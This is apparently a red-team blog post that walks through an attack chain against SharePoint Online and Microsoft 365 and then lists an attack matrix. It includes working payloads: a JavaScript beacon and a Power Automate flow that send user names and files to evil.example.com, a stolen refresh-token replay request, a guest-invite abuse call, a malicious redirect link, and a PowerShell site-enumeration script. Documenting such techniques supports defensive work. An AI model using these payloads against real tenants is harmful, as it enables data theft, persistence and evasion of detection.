SharePoint Online as a Weapon: Offensive Tactics in Microsoft 365 Collaboration
In the modern Microsoft 365 threat landscape, SharePoint Online is no longer a document dump. It is a sprawling, API rich, over permissioned jungle wired into the core fabric of collaboration. With tight Graph API hooks, seamless integration with Teams, OneDrive, Power Platform, and automation pipelines galore, it’s practically begging to be abused for lateral traversal, data staging, and stealth persistence.
Note: The recent attacks and penetration testing with the Microsoft 365 Copilot show us the sensitivity of SharePoint Online data.
For seasoned red team operators, initial cloud access often pivots straight into SharePoint. Why? Because it’s noisy by design, trusted by default, and packed with exploitable logic. The goal isn’t smash and grab file theft, it’s surgical extraction, such as low and slow exfil, hiding in plain sight, and camouflaging activity within business as usual workflows.
This post touches the structured attack chain mapped to the SharePoint Online Attack Matrix, showcasing how to move from access to impact using native features, minimal noise, and a whole lot of cloud-native mischief.
For a deep dive attack scenario, see the upcoming and related blog post for Red Teaming SharePoint.
In the sprawling landscape of Microsoft 365, SharePoint Online often masquerades as a mundane document repository. But beneath the surface, it’s a goldmine for adversaries who know how to weaponize cloud native features. This scenario explores a full spectrum attack chain, blending reconnaissance, stealth access, persistence, and exfiltration crafted to look like business as usual.
It all begins with passive recon. The attacker scrapes SharePoint Online URLs using tools like urlcrazy, waybackurls, or OSINT platforms that harvest indexed content. A crafted Google Dork such as site:*.sharepoint.com inurl:/sites/ returns externally exposed site collections. Using Microsoft Graph, they enumerate these sites with:
GET https://graph.microsoft.com/v1.0/sites?search=*
Authorization: Bearer <token>
To locate anonymous share links, they abuse the sharingLink API or parse shared folder structures with predictable naming schemes.
Next comes the initial access. A compromised endpoint yields a cached refresh_token from the device’s browser session, often extracted via DPAPI or memory scraping. The attacker silently redeems it with:
POST https://login.microsoftonline.com/common/oauth2/v2.0/token
Content-Type: application/x-www-form-urlencoded
grant_type=refresh_token
client_id=<client_id>
refresh_token=<stolen_token>
scope=https://graph.microsoft.com/.default
With this, they access the tenant without triggering MFA or device compliance checks. A secondary stealth path leverages SharePoint Designer’s legacy auth: the session is replayed using NTLM or cookie injection via Burp or PowerShell based session hijacks.
Once inside, the adversary performs discovery using the Graph API to list document libraries:
GET https://graph.microsoft.com/v1.0/sites/<site-id>/drives
They enumerate user permissions, group memberships, and identify high value sites by looking for patterns like /Finance/, /Legal/, or /Mergers/. The attacker then dumps the sharing configurations and guest access with:
GET https://graph.microsoft.com/v1.0/sites/<site-id>/permissions
Instead of triggering alerts by uploading EXEs or DLLs, the attacker plays the long game. They create a hidden SharePoint page with an embedded JavaScript payload. The payload silently pings an attacker controlled endpoint every time the page is loaded:
<script>
fetch("https://evil.example.com/beacon?user=" + _spPageContextInfo.userLoginName);
</script>
The page is buried inside a legacy document set and hidden from navigation using SharePoint’s REST API. In parallel, the attacker registers a malicious SPFx app that requests Sites.FullControl.All permission and is approved through a social engineering pretext.
With persistence in place, lateral movement begins. The attacker identifies a Teams connected SharePoint site with synced document libraries and uploads a weaponized .docm file containing auto execution macros. Once synced via OneDrive, the payload triggers execution on victim devices.
They also abuse internal redirect links to hijack user sessions. A link like https://tenant.sharepoint.com/sites/Finance/_layouts/15/redirect.aspx?src=https://attacker.com/login.html Silently redirects authenticated users and captures session metadata via embedded tracking scripts.
Exfiltration is subtle and surgical. A Microsoft Power Automate flow is created using the attacker’s guest account, configured to trigger on new file uploads in a specific library and send the files to Dropbox or an S3 bucket:
{
"trigger": "When a file is created in a folder",
"action": {
"type": "HTTP",
"method": "POST",
"uri": "https://evil.example.com/upload",
"headers": {
"Authorization": "Bearer attacker-token"
},
"body": "@{triggerOutputs()?['body']}"
}
}
Alternatively, the attacker directly syncs the library with OneDrive, copies the files locally, and uses the SharePoint API to revert file versions post-exfil to erase visibility:
POST https://graph.microsoft.com/v1.0/sites/<site-id>/drives/<drive-id>/items/<item-id>/versions/<version-id>/restoreVersion
Command and control are embedded into the platform itself. The attacker uses metadata edits in document properties to encode small payloads or signals:
Invoke-MgGraphRequest -Method PATCH `
-Uri "https://graph.microsoft.com/v1.0/sites/<site-id>/lists/<list-id>/items/<item-id>/fields" `
-Body @{ CustomSignal = "ping:ready" }
Power Automate flows act as a polling channel where new list items are interpreted as commands, enabling a fileless C2 loop that blends into user created automation.
What makes this chain particularly dangerous is its use of native APIs, default permissions, and legitimate user behaviors. There are no exploits. There is no malware. It’s just a smart abuse of the very tools designed to enable productivity and collaboration. From a red team perspective, it’s art. From a blue team perspective, it’s a nightmare hiding in plain sight.
With that being said, let’s look at the SharePoint Online Attack Matrix and get the potential. This matrix is the light version, while I am testing new approaches and vectors in SharePoint Online.
Reconnaissance
Before exploiting, attackers profile exposed SharePoint instances. Here’s how:
Enumerate SharePoint Online URLs
Attackers brute-force or discover SharePoint subsite URLs using tools or OSINT. Common paths (/sites/hr, /teams/devops) are guessed, often using wordlists.
Crawl Public Documents via Google Dorking
Public-facing documents can be indexed by search engines. Google Dorks like site:sharepoint.com filetype:xlsxhelp extract sensitive info without touching the tenant directly.
Search for Anonymous Sharing Links
Attackers use Graph Search or legacy API calls to identify links that allow “Anyone with the link” access, especially to documents not meant to be public.
Discover Internal Naming Conventions via Metadata
Accessing internal metadata like SPWeb.Title or URL fragments can help identify structure, departments, and naming patterns useful for further enumeration.
Abuse Graph Search to Locate Libraries
With even limited Graph permissions (e.g., from a delegated token), an attacker can query /search/query?querytext=’*’ to list site collections and files they shouldn’t know about.
SharePoint Online Exposure Recon
# SharePoint Online Exposure Recon v1.1 (the script is available at GitHub)
$domain = "demospo.sharepoint.com"
$onedriveDomain = "demospo-my.sharepoint.com"
$paths = @(
# Business units
"sites/hr", "sites/finance", "sites/legal", "sites/sales", "sites/marketing", "sites/operations", "sites/security", "sites/support",
# Engineering and dev
"sites/engineering", "sites/dev", "sites/devops", "sites/qa", "sites/test", "sites/rd", "sites/research", "sites/code",
# Collaboration and projects
"sites/projects", "sites/collaboration", "sites/innovation", "sites/internal", "sites/teamspace", "sites/initiatives",
# IT & Infrastructure
"sites/it", "sites/infrastructure", "sites/tools", "sites/automation", "sites/scripts", "sites/platforms",
# M365 / Teams defaults
"teams/marketing", "teams/hr", "teams/finance", "teams/engineering", "teams/product", "teams/devops", "teams/sales", "teams/security", "teams/rd",
# Public/external
"sites/public", "sites/guest", "sites/community", "sites/press", "sites/media", "sites/events",
# Misconfig or leftover test
"sites/demo", "sites/DemoSite", "sites/temp", "sites/migration", "sites/poc", "sites/old", "sites/archive", "sites/backup", "sites/beta", "sites/junk", "sites/testsite1", "sites/testsite2",
# Admin or sensitive by role
"sites/compliance", "sites/ciso", "sites/legalhold", "sites/investigation", "sites/audit", "sites/legalarchive",
# Partner or client exposure
"sites/partners", "sites/vendors", "sites/external", "sites/customer", "sites/resellers", "sites/clients"
)
# Optional personal OneDrive users
$usernames = @("elli", "moshe", "ron")
foreach ($user in $usernames) {
$encoded = $user -replace "\.", "_"
$paths += "personal/${encoded}_demospo_com"
}
$headers = @{
"User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) PowerShellRecon/2.0"
}
$outputFile = "Exposed_SharePoint_Sites.txt"
if (Test-Path $outputFile) { Remove-Item $outputFile }
function Test-Url {
param (
[string]$url,
[string]$type
)
try {
$res = Invoke-WebRequest -Uri $url -UseBasicParsing -Headers $headers -TimeoutSec 5
if ($res.StatusCode -eq 200) {
Write-Host "[+] $type{}: $url" -ForegroundColor Green
Add-Content -Path $outputFile -Value "$type{}: $url"
if ($res.Content -match "SharePoint" -or $res.RawContent -match "SPClient") {
# Check metadata API
$metaEndpoints = @("_api/site", "_api/web", "_api/web/title", "_api/web/lists")
foreach ($api in $metaEndpoints) {
try {
$metaUrl = "$url/$api"
$meta = Invoke-WebRequest -Uri $metaUrl -Headers $headers -UseBasicParsing -TimeoutSec 5
if ($meta.StatusCode -eq 200) {
Write-Host " [i] Metadata exposed: $api" -ForegroundColor Yellow
}
} catch {}
}
# Shared Documents test
$sharedUrl = "$url/_layouts/15/start.aspx#/Shared%20Documents/Forms/AllItems.aspx"
try {
$docRes = Invoke-WebRequest -Uri $sharedUrl -Headers $headers -UseBasicParsing -TimeoutSec 5
if ($docRes.StatusCode -eq 200) {
Write-Host " [!] Shared Docs are anonymously visible" -ForegroundColor Magenta
}
} catch {}
}
} elseif ($res.StatusCode -in 301, 302) {
Write-Host "[>] Redirected: $url -> $($res.Headers.Location)" -ForegroundColor Cyan
}
} catch {
Write-Host "[-] Not accessible: $url" -ForegroundColor DarkGray
}
}
# Scan each path
foreach ($path in $paths) {
if ($path.StartsWith("personal/")) {
$url = "https://$onedriveDomain/$path"
Test-Url -url $url -type "OneDrive"
} else {
$url = "https://$domain/$path"
Test-Url -url $url -type "SharePoint"
}
}
Write-Host "`n[+] Scan completed. Results saved to: $outputFile" -ForegroundColor Cyan
Initial Access
After recon, it’s time to get inside. These are some of the SharePoint-specific paths:
Phishing via SharePoint-Hosted Maldocs
Technique: Upload and share macro enabled Office documents via SharePoint Online to leverage the trusted domain appearance.
Execution:
- Upload a .docm or .xlsm to a SharePoint site.
- Create a sharing link (Anyone with the link) using /sites/portal/:x:/s/….
- Distribute via phishing emails as “HR Policies Update” or “Monthly Report”.
- Once opened, the embedded VBA downloads the next payload.
Notes:
- Uses legitimate Microsoft infrastructure, bypassing many reputation-based defenses.
- Links are visually similar to internal document sharing.
OAuth Token Reuse from Compromised Devices
Technique: Replay access/refresh tokens obtained from browser sessions or local caches.
Execution:
Tokens extracted from Cookies, localStorage, or filesystem (.IdentityService\msal or Chrome localStorage).
Replay access_token directly via:
Authorization: Bearer eyJ0eXAiOiJKV1Q…
GET https://graph.microsoft.com/v1.0/me/drive
If refresh_token is also stolen, the attacker can generate long-lived sessions.
Notes:
- No credential re-entry required.
- Tokens may bypass MFA if originally issued on a compliant or trusted device.
Guest Account Injection via Invitation Abuse
Technique: Inject attacker-controlled identities into the tenant via Azure AD B2B invite APIs.
Execution:
Craft an invitation with:
POST /v1.0/invitations
{
“invitedUserEmailAddress”: “attacker@evil.com”,
“inviteRedirectUrl”: “https://spo.evil.com”,
“sendInvitationMessage”: false
}
Access the invitationRedeemUrl directly to onboard as a guest.
Browse to: https://tenant.sharepoint.com/sites/hr
if guest access policies are open.
Notes:
- Attackers gain persistent access with a legitimate Guest object in Entra ID.
- Appears in audit logs as a legitimate invite flow.
Consent Phishing with Overprivileged SPFx App
Technique: Trick the user into granting OAuth consent to a malicious SharePoint Framework (SPFx) app with excessive Graph permissions.
Execution:
Register an SPFx app in Azure AD with broad scopes (Sites.ReadWrite.All, Files.Read.All, Mail.Read).
Generate consent URL:
- Host a fake Microsoft login page prompting the user to grant consent.
- Upon success, the attacker uses the access_token to exfiltrate SharePoint and OneDrive files.
Notes:
- The app appears in Enterprise Applications under the user’s account.
- Attackers retain long-lived access, independent of user session.
Replay Session via Legacy Auth in SharePoint Designer
Technique: Exploit legacy authentication endpoints that still support NTLM/basic auth via SharePoint Designer.
Execution:
Probe endpoints such as:
https://tenant.sharepoint.com/_vti_bin/authentication.asmx
- Attempt NTLM relay or password spraying on endpoints like _vti_bin/client.svc/ProcessQuery.
- If accepted, establish a session and abuse SharePoint Designer to modify pages or workflows.
Notes:
- Legacy endpoints do not enforce modern token-based auth.
- Lateral movement is possible through page editing or malicious workflow injection.
Discovery
Once inside, attackers move quietly to map the environment.
Enumerate Site Collections via Graph
Using /sites?search=*, attackers list available site collections and subsites accessible by the current token.
Identify High-Value Libraries
Browsing drive titles and descriptions (/sites/<site-id>/drives) lets attackers prioritize libraries like FinanceDocs, HR_Reviews, or LegalHold.
List Group Memberships with SharePoint Access
Enumerate M365 groups (/groups) to check which groups grant SharePoint access. Cross-reference with /group/{id}/sites to find shared team content.
Dump Sharing Settings Using API
Call /permissions on each library to enumerate who has access (internal users, guests, or “Anyone” links). Useful for privilege escalation or data staging.
Detect Guest Access on Sensitive Sites
Look for external principals (user@externaldomain.com) in permission sets. These accounts may have excessive access, acting as low-noise pivots.
Persistence
To maintain access without maintaining sessions, attackers exploit SharePoint-native features.
Create Hidden Pages with Embedded JS Payloads
In classic SharePoint pages, JS can be embedded to act as a beacon or loader when users view a page. Great for user-triggered callbacks.
Persist via Flow Automation Trigger
Attackers create Power Automate flows that react to file changes and trigger exfiltration actions. Even if their token is revoked, the flow runs server-side.
Add Malicious Guest Account to Private Group
If the attacker can modify group membership, they add a rogue guest to persist without triggering user suspicion.
Upload Disguised Web Parts to Classic Sites
Custom web parts with obfuscated JS or links can be uploaded to legacy sites. These are often overlooked during security reviews.
Register a Malicious SharePoint App
Attacker registers an app that acts on behalf of a user or site, granting API access without the need for continuous interaction.
Lateral Movement
From SharePoint, attackers can pivot across M365 services.
Move via Shared Document Collaboration
By uploading malicious content to shared libraries, attackers trick collaborators into opening payloads, especially if versioning is enabled.
Inject Files into Shared Libraries with Auto-Sync
Office files placed in OneDrive-backed libraries automatically sync to all users. A .docx with an embedded macro silently lands on every device.
Use Internal Links to Redirect User Sessions
A manipulated link can redirect users to phishing portals or payloads while retaining the SharePoint look and feel.
Transition to OneDrive Using Same Token
With a Graph token, an attacker can switch context from /sites to /me/drive, gaining access to personal files and downloads.
Abuse Power Automate to Drop Files Cross-Site
A flow in one site can copy malicious files to another, using internal permissions. Great for silent propagation.
Exfiltration
It’s not just what you steal, it’s how stealthy the exit is.
Create Anonymous Share Links and Forward
Files are shared using “Anyone with the link” and forwarded to attacker inboxes or bots. Rarely monitored in real time.
Use Flow Connector to Exfil to Attacker-Controlled Cloud
Power Automate supports HTTP actions and third-party services (Dropbox, Google Drive). Attackers use this to bypass DLP.
Sync Libraries to Local and Remove Sharing Trail
By syncing libraries using the OneDrive sync client, attackers copy the files and delete sharing links to remove evidence.
Export Data Using Batched Graph Calls
Graph API batching (20 requests in one call) is ideal for high-speed, low-noise exfil. It avoids triggering EDR for each request.
Revert File Versions Post-Copy for Stealth
After downloading, attackers revert a file back to an older version, hiding their tampering in the file history.
Command & Control (C2)
Even in a SaaS platform, attackers can communicate.
Embed JS Beacons in Classic SharePoint Pages
A small JS snippet pings a C2 server when a legit user views the page. Very low footprint and hard to trace back to the actor.
Signal via Document Metadata Edits
Attackers modify metadata fields like Title, ModifiedBy, or Tags to encode C2 commands (like DNS beaconing, but for SharePoint).
Use Flow as a Polling Channel
Flows can poll specific document changes or hidden libraries to receive new commands or files. It’s SaaS-native polling without implants.
Hide C2 Commands in SharePoint List Items
Custom lists (task lists, announcements) can contain encoded commands. If no one looks, it flies under the radar.
Trigger C2 Through New Document Uploads
C2 is initiated when a file with a specific name or tag is uploaded to a watched library. This “dead drop” style of communication works well in locked-down tenants.
Summary
SharePoint Online isn’t just for docs, it’s a red team playground wired into Microsoft 365. This post walks through a complete kill chain using native Graph APIs, legacy auth gaps, SPFx abuse, and Flow-based C2 to blend in, move laterally, and exfiltrate data without a single exploit. Think cloud-native persistence meets silent collaboration hijack.
The good news? Microsoft equips defenders with the tools to fight back. From conditional access and SharePoint sharing policies to Graph API governance, Defender for Cloud Apps, and anomaly detection via Microsoft Sentinel, most of these attack paths can be hardened or monitored. The challenge isn’t the lack of controls, it’s knowing where to look and how to configure them before the red team gets there first.
